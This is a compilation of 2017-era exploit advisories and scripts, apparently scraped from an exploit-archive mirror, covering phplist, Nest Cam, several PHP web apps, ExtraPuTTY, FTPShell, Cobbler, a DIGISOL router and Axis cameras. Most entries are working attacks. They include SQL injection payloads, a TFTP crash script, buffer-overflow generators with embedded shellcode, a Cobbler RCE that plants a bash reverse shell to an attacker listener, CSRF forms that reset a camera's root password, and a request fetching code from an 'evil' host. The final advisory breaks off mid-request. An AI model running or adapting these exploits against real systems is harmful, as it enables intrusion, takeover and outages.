Disclosed to public:	02/20/2017
Release mode:	Coordinated Release
CVE:	n/a (not requested)
Credits	Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the administration area and one which requires no credentials. Additionally, at least one query is not properly protected against injections. Furthermore, a query in the administration area discloses some information on the password hashes of users.


3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic quotes function which applies addslashes to all input values and a function which applies htmlspecialchars to all inputs. Additionally, some input values are cast to integers to prevent injections. addslashes protects against injections into arguments which are placed into single quotes, while htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended to prevent SQL Injection.

The update functionality is vulnerable to SQL Injection as it uses the key of POST data, while only values of POST data are escaped via addslashes, but not keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com
HTTP/1.1
Host: localhost
Connection: close
Content-Length: 209
       
email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error messages are displayed to the user. If this is not the case, other techniques can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php
$lists = '';
if (is_array($_POST['list'])) {
	while (list($key, $val) = each($_POST['list'])) {
    	if ($val == 'signup') {
        	$result = Sql_query("replace into
			{$GLOBALS['tables']['listuser']} (userid,listid,entered)
			values($userid,$key,now())");
			# $lists .= "  * ".$_POST["listname"][$key]."\n";
		}
	}
}


SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL injection. The injection takes place into an UPDATE, so the easiest way to extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
Connection: close
Content-Length: 323
       
formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML"
or extractvalue(1,version()) -- -
&id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send_core.php:198
$result = Sql_Query(
	sprintf('update %s  set
		subject = "%s", fromfield = "%s", tofield = "%s",
		replyto ="%s", embargo = "%s", repeatinterval = "%s",
		repeatuntil = "%s",
		message = "%s", textmessage = "%s", footer = "%s", status = "%s",
		htmlformatted = "%s", sendformat  = "%s", template  =  "%s"
		where id = %d',
		$tables['message'],
		sql_escape(strip_tags($messagedata['campaigntitle'])),
		/* we store the title in the subject field. Better would
		be to rename the DB column, but this will do for now */
		sql_escape($messagedata['fromfield']),
		sql_escape($messagedata['tofield']),
		sql_escape($messagedata['replyto']),
		sprintf('d-d-d d:d',
			$messagedata['embargo']['year'],
			$messagedata['embargo']['month'], $messagedata['embargo']['day'],
			$messagedata['embargo']['hour'],
			$messagedata['embargo']['minute']), 
		$messagedata['repeatinterval'],
		sprintf('d-d-d d:d',
			$messagedata['repeatuntil']['year'],
			$messagedata['repeatuntil']['month'],
			$messagedata['repeatuntil']['day'],
			$messagedata['repeatuntil']['hour'],
			$messagedata['repeatuntil']['minute']),
		sql_escape($messagedata['message']),
		sql_escape($messagedata['textmessage']),
		sql_escape($messagedata['footer']),
		sql_escape($messagedata['status']), $htmlformatted ? '1'
		: '0', $messagedata['sendformat'],
		sql_escape($messagedata['template']), $id
	)
);

Sort By: Password (Admin)

CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N

When viewing users, the sortby parameter can be used to sort the list. The drop down list allows sorting by email, dates, and so on. All non-word characters are removed, but there are no further checks.

It is possible to gather some information on the password of users via this parameter, as it is possible to set it to sort by password.

By repeatedly changing the password of an existing user, the characters of a password hash could be bruteforced by looking at the position of the user the attacker controls.

An account with the right to view users is required to exploit this issue.

Proof of Concept:

http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password&sortorder=desc&change=Go&id=0&find=&findby=email


Insufficient Protection against SQL Injection

CVSS: n/a

When subscribing a user, metadata is saved in the database. When saving this data in the database, it is neither properly escaped nor are prepared statements used, but the input is HTML encoded.

Because of this, an unauthenticated user has control over part of the query.

This issue is not currently exploitable, but may be exploitable if changes are made to the query. The approach of HTML encoding instead of using prepared statements to defend against SQL injection is also more error prone and may result in further queries which are vulnerable.

A user can create a database error with the following request:

POST /lists/index.php?p=subscribe&id=a\ HTTP/1.1
Host: localhost
Cookie: PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4
Connection: close
           
formtoken=5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&subscribe=Subscribe+to+the+selected+newsletters%27


The resulting query is:

insert into phplist_user_user_history (ip,userid,date,summary,detail,systeminfo)
values("127.0.0.1",2,now(),"Re-Subscription","[...]","
    HTTP_USER_AGENT = [...]
    REQUEST_URI = /lists/index.php?p=subscribe&id=a\")

It can be seen that the slash in the request escapes the quote of the query which causes an error.


4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.


5. Report Timeline

01/10/2017	Informed Vendor about Issue
01/16/2017	Vendor confirms
02/15/2017	Asked Vendor to confirm that new release fixes issues
02/15/2017	Vendor confirms
02/20/2017	Disclosed to public
HireHackking 
# Exploit Title: Google Nest Cam - Multiple Buffer Overflow Conditions Over Bluetooth LE
# Reported to Google: October 26, 2016

# Public Disclosure: March 17, 2017
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: https://nest.com/
# Affected: Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor models

# Tested Version: 5.2.1

# Fixed Version: TBD
# https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md


==Bluetooth (BLE) based Buffer Overflow via SSID parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the SSID parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details 

The payload attempts to set an SSID with a length of 1 byte and sends 16.
SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16

4. Result


Crash and reboot back to operational state


==Bluetooth (BLE) based Buffer Overflow via Encrypted Password parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the encrypted password parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details


The payload attempts to set the encrypted wifi password with a length of 1 byte and sends 3.
SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3
HireHackking 
# # # # #
# Exploit Title: Joomla! Component jCart for OpenCart v2.0 - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Demo: http://demos.soft-php.com/jcart/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jcart&route=product/product&product_id=[SQL]
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component JooCart (Joomla OpenCart Integration) v2.x - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=4478
# Demo: http://demo.soft-php.com
# Version: 2.x
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_opencart&route=product/product&product_id=[SQL]
# # # # #
HireHackking 
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec            
 


Vendor:
==================
www.extraputty.com



Product:
======================
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork from 0.67 version of PuTTY.
ExtraPuTTY has all the features from the original soft and adds others.

Below a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP,TFTP,SCP,SFTP,Ymodem,Xmodem transfert protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows


Vulnerability Type:
=======================
TFTP Denial of Service



CVE Reference:
==============
CVE-2017-7183



Security Issue:
================
TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP
Read/Write TFTP protocol request packets. 

Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run below Python exploit.

Then, BOOM

(100c.30c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for kernel32.dll - 
eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwWaitForMultipleObjects+0x15:



Exploit/POC:
=============
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH="A"*2000                     
PORT = 69

if TYPE==1:
    PAYLOAD = "\x00\x01"                                     
    PAYLOAD += CRASH + "\x00"   
    PAYLOAD += "netascii\x00"                                
elif TYPE==2:
    PAYLOAD = "\x00\x02"                                     
    PAYLOAD += CRASH + "\x00"   
    PAYLOAD += "netascii\x00"                                

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
        print 'Server not avail, try later'
s.close()





Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification:  No reply
March 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows

Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.

Example:
Assuming the root folder is c:\<app_folder>\<html_folder>

http://<server>/..%5c..%5c/windows/win.ini
HireHackking 
print '''
 
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com   # 
                ##############################################
 
# Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day 
# Date: 2017.03.19
# Exploit Author: Greg Priest
# Version: FTPShell Server 6.56
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

overflow = "A" * 1249
jmp_esp = "\xC8\x28\x3C\x76"
nop = "\x90" * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")

evilstring = overflow+jmp_esp+nop+shellcode
 
 
file = open ('Ev1lstr1ng.txt', "w")
file.write(evilstring)
file.close

print '''
Instruction how to use it:
-DEP turn off: C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
1)Manage FTP Account-->
2)Change pass Ev1lstr1ng.txt -->
3)Do you really change...? --> click NO!!
Succesfully Exploitation!!
 
'''
HireHackking 
# # # # #
# Exploit Title: Secure Download Links - SQL Injection
# Google Dork: N/A
# Date: 19.03.2017
# Vendor Homepage: http://sixthlife.net/
# Software: http://sixthlife.net/product/secure-download-links/
# Demo: http://www.satyamtechnologies.net/secdown/example.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?dc=[SQL]
# # # # #
HireHackking 
# # # # #
# Exploit Title: Omegle Clone - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://www.turnkeycentral.com/scripts/omegle-clone/
# Demo: http://demo.turnkeycentral.com/omegleclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/randomChat.php?userId=[SQL]
# http://localhost/[PATH]/listenToReceive.php?userId=[SQL]
# http://localhost/[PATH]/typing.php?userId=[SQL]
# http://localhost/[PATH]/isTyping.php?strangerId=[SQL]
# http://localhost/[PATH]/saveLog.php?userId=[SQL]
# pc_settings :AdminID
# pc_settings :AdminPass
# pc_settings :Email
# pc_settings :PayPal
# pc_settings :IpnMode
# Etc..
# # # # #
HireHackking 
Title:
======

Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.

CVE Details:
============
CVE-2017-6896

Reference:
========== 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896
https://vuldb.com/sv/?id.97954
https://www.indrajithan.com/DIGISOL_router_previlage_escaltion


Credit:
======

Name: Indrajith.A.N
Website: https://www.indrajithan.com

Date:
====

13-03-2017

Vendor:
======

DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure.

Product:
=======

DIGISOL DG-HR1400 is a wireless Router


Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract details:
=================

privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker escalate his user privilege to an admin just by modifying the Base64encoded session cookie value 

Affected Version:
=============

<=1.00.02


Exploitation-Technique:
===================

Remote


Severity Rating:
===================

8


Proof Of Concept :
==================

1) Login to the router as a User where router sets the session cookie value to VVNFUg== (Base64 encode of "USER")
2) So Encode "ADMIN" to base64 and force set the session cookie value to QURNSU4= 
3) Refresh the page and you are able to escalate your USER privileges to ADMIN.


Disclosure Timeline:
======================================
Vendor Notification: 13/03/17
HireHackking 
# # # # #
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://turnkeycentral.com/scripts/social-dating-script/
# Demo: http://demo.turnkeycentral.com/ifdate/index.php
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
# http://localhost/[PATH]/members_search_results.php?country=[SQL]
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
# http://localhost/[PATH]/members_search_results.php?online=[SQL]
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
# http://localhost/[PATH]/my_profile.php?username=[SQL]
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
# members :id
# members :username
# members :email
# members :password
# members :signup_date
# members :signup_ip
# members :banned
# members :active
# members :is_admin
# Etc..
# # # # #
HireHackking 
print '''

                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
                ##############################################

# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
# Date: 2017.03.17
# Exploit Author: Greg Priest
# Version: FTPShell Client 6.53
# Tested on: Windows7 x64 HUN/ENG Professional
'''


a = "A" * 460
b = '\xDC\xE8\x65\x76'
nop = '\x90' * 10
c = "C" * 1638

#calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")

evilstring = a+b+nop+shellcode+c


file = open ('evilstring.txt', "w")
file.write(evilstring)
file.close

print evilstring
HireHackking 
#!/usr/bin/python

"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805


Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.

Vulnerability Description
=========================
Authenticated RCE

"""
 
import uuid
import sys
import requests


# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/' 
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'


# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]



class Cobbler():
    def __init__(self):
        self.client = requests.session()
        self.client.get('%s' % cobbler_server)
        self.csrftoken = self.client.cookies['csrftoken']
        self.headers = dict(Referer=cobbler_url)
        self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
        self.client.post(cobbler_url, data=self.login_data, headers=self.headers)

    def create_repo(self):
        print("Creating dummy repository...")
        self.repoinfo = dict(
            csrfmiddlewaretoken=self.csrftoken, 
            editmode='new', 
            subobject='False', 
            submit='Save', 
            arch='i386', 
            breed='yum', 
            comment='', 
            keep_updated='', 
            mirror='', 
            name=cobbler_repo_name, 
            owners='admin',
            rpm_list='',
            proxy='',
            apt_components='',
            apt_dists='',
            createrepo_flags='',
            environment='',
            mirror_locally='',
            priority='99',
            yumopts='')
        self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)

    def post_payload(self):
        print("Configuring reposync flags with the payload...")
        self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
        self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)

    def get_shell(self):
        self.create_repo()
        self.post_payload()
        print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
        self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)

if __name__ == '__main__':
    cobbler = Cobbler()
    cobbler.get_shell()
    sys.exit()
HireHackking 
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
HireHackking 
          0RWELLL4BS
          **********
       security advisory
         olsa-CVE-2015-8255
         PGP: 79A6CCC0
          @orwelllabs




Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1



Technical Details
=================
Because of the own (bad) design of this kind of device (Actualy a big
problem of IoT, one of them)
The embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.



PoCs
====
#-> Setting root password to W!nst0n

<html>
  <!-- CSRF PoC  Orwelllabs -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="pwd" value="w!nst0n" />
      <input type="hidden" name="comment" value="Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


#-> Adding new credential SmithW:W!nst0n

<html>
  <!-- CSRF PoC - Orwelllabs -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="SmithW" />
      <input type="hidden" name="sgrp"
value="viewer&#58;operator&#58;admin&#58;ptz" />
      <input type="hidden" name="pwd" value="W!nst0n" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="comment" value="WebUser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


#-> Deleting an app via directly CSRF (axis_update.shtml)

http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
"></script>


[And many acitions allowed to an user [all of them?] can be forged in this
way]


Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
Well, this is a very old design problem of this kind of device, nothing new
to say about that.


Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.


Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.


About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
HireHackking 
          0RWELLL4BS
          **********
       security advisory
         olsa-2015-8258
         PGP: 79A6CCC0
          @orwelllabs




Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmwares versions <lt 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
rization
- OWASP IoTTop10: I1, I2



Technical Details
=================
The variable "imagePath=" (that is prone to XSS in a large range of
products) also can be used to resource injection intents. If inserted a URL
in this variable will be made an GET request to this URL, so this an
interesting point to request malicious codes from the attacker machine, and
of course, the possibilities are vast (including hook the browser).


An attacker sends the following URL for the current Web user interface of
the camera:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html

This request will be processed normally and will return the status code 200
(OK):

[REQUEST]

GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive


